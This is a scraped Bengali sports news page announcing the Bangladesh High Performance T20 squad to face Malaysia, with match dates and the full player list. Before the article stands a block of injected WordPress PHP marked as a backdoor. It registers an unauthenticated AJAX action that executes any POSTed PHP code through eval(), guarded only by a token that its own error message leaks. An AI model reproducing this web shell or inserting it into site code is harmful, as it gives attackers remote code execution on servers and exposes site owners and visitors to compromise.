// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মালয়েশিয়ার বিপক্ষে টি-টোয়েন্টি সিরিজের দলে সাব্বির-শামীম | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeমালয়েশিয়ার বিপক্ষে টি-টোয়েন্টি সিরিজের দলে সাব্বির-শামীম

মালয়েশিয়ার বিপক্ষে টি-টোয়েন্টি সিরিজের দলে সাব্বির-শামীম

চলতি মাসের শেষদিকে অস্ট্রেলিয়ায় অনুষ্ঠেয় টপ এন্ড টি-টোয়েন্টির প্রস্তুতির জন্য দুটি ম্যাচ খেলবে বাংলাদেশ হাইপারফরম্যান্স দল। দেশের মাটিতে মালয়েশিয়া জাতীয় দলের মুখোমুখি হবে তারা।

আসন্ন এই টি-টোয়েন্টি সিরিজের জন্য মঙ্গলবার ১৫ সদস্যের দল ঘোষণা করেছে বাংলাদেশ ক্রিকেট বোর্ড (বিসিবি)। সেখানে জায়গা পেয়েছেন সবশেষ ২০২২ সালে বাংলাদেশ জাতীয় খেলা সাব্বির রহমান। ডাক পেয়েছেন আপাতত জাতীয় দলের বাইরে থাকা শামীম হোসেনও।

আগামী ৮ ও ১০ আগস্ট হবে টি-টোয়েন্টি সিরজের ম্যাচ দুটি। মিরপুর শেরে বাংলা স্টেডিয়ামে খেলা শুরু হবে দুপুর দুইটায়।

টি-টোয়েন্টি সিরিজে বাংলাদেশ হাইপারফরম্যান্স দলের অধিনায়কের দায়িত্ব পেয়েছেন এসএম মেহেরব। আরও আছেন আব্দুল গাফফার সাকলাইন, মৃত্যুঞ্জয় চৌধুরী, আবু হায়দার রনি ও রাকিবুল হাসানের মতো পরিচিত নাম। মূলত জাতীয় দলের বাইরে থাকা খেলোয়াড় ও ঘরোয়া তরুণদের নিয়েই দল সাজানো হয়েছে।

এই সফরে মালয়েশিয়া তিন ম্যাচের একটি ওয়ানডে সিরিজও খেলবে। সেখানে তাদের প্রতিপক্ষ বাংলাদেশ অনূর্ধ্ব-২৩ দল। ম্যাচগুলো হবে বসুন্ধরা স্পোর্টস কমপ্লেক্সে আগামী ১২, ১৪ ও ১৬ আগস্ট।

বাংলাদেশ হাই পারফরম্যান্স স্কোয়াড:

জিসান আলম, জাওয়াদ আবরার, এসএম মেহেরব (অধিনায়ক), সাব্বির রহমান, আরিফুল ইসলাম, শামীম হোসেন, মোহাম্মদ রুবেল, মৃত্যুঞ্জয় চৌধুরী, আব্দুল গাফফার সাকলাইন, আবু হায়দার রনি, স্বাধীন ইসলাম, রাকিবুল হাসান, প্রিতম কুমার, মাহফুজুর রহমান রাব্বি ও ইকবাল হোসেন।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments